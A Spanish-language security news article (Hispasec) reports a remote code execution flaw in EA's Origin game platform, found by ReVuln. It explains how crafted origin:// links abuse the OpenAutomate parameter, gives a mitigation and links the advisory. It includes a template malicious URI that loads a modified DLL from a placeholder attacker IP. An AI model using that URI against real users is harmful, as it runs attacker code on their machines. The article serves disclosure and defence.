- Otras noticias
Alerta de un nuevo troyano que se hace pasar por una extensión de Google Chrome
A la caza de bugs en Windows Vista
El troyano PSW.WOW.FW. roba información del juego "World of Warcraft"
Troyanos bancarios o la evolución del phishing
Crecen las amenazas informáticas para teléfonos móviles
RIM advierte de una vulnerabilidad de seguridad de la BlackBerry
0-day en Adobe Reader y nuevas funcionalidades y vulnerabilidades en Flash Player 
Descubren una nueva "botnet" con casi 2 millones de equipos infectados por el troyano "Hexzone"
Encuentran una vulnerabilidad en Sun Java System Proxy y Web Server HTTP
El 'phishing', la nueva plaga de internet
- En el foro
-
Ejecución remota de código en la plataforma de juegos Origin
19 Mar 2013 | HISPASEC.COM
Los investigadores Luigi Auriemma y Donato Ferrante de la firma ReVuln, que ya alertaron de una vulnerabilidad similar en Steam en noviembre de 2012, han realizado el mismo análisis en la plataforma de Electronics Arts y han encontrado una vulnerabilidad equivalente. Según sus investigaciones un atacante remoto podría ejecutar código malicioso a través de enlaces origin:// especialmente manipulados.
Básicamente la plataforma Origin utiliza el siguiente protocolo para iniciar y comprobar la validez de un juego:
- Inicio del ejecutable del juego que invoca a la plataforma Origin instalada en el sistema, mediante un URI personalizado al efecto "origin://"
- Cierre del proceso del juego.
- La plataforma Origin una vez hechas las comprobaciones DRM que indican que el juego es original, lo lanza a través del mismo URI inicial suministrado.
Este URI "origin://" como tal es accesible a través de cualquier acceso directo del sistema o desde el navegador, por lo que un atacante sólo tendría que incluir un URI malicioso en su página web, o en un correo y distribuirlo.
Los investigadores comentan que existen diferentes maneras de conseguir que se ejecute el código. En su comunicado se centran en la función OpenAutomate que permite iniciar un test de comprobación del sistema.
Una URI maliciosa utilizando este comando sería la siguiente:
origin:// comando /< ID del juego>?CommandParams = openautomate\\< IP del atacante >\\ openautomate.dll
Donde ID es el identificador del juego instalado en el sistema y openautomate.dll la librería especialmente modificada que, aparte de ejecutar el juego, inicia el código malicioso desde la IP del atacante.
El ID del juego no es particular para cada usuario, por lo que es trivial incluir en una llamada un conjunto de IDs de juegos vulnerables por 'openautomate' para explotar la vulnerabilidad, aunque no se conozca a priori qué juego del catálogo mantiene el usuario instalado en su sistema.
En este vídeo se puede ver el proceso completo y la demostración de la vulnerabilidad: http://vimeo.com/61361586
Como solución temporal, se indica la posibilidad de desactivar o bloquear el protocolo "origin://" en el sistema y en el navegador, por lo que sólo se podría iniciar el juego desde la plataforma Origin directamente, hasta que se solucione la vulnerabilidad.
Más información:
EA Origin Insecurity (when local bugs go remote... again) http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf
- Boletín
Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.
- Comentarios
- LaFlecha.net no se hace responsable del contenido de los comentarios publicados.
Entérate de cuándo hay nuevos comentarios - Publicidad
- Ahora en LaFlecha puedes encontrar Cursos y Másters
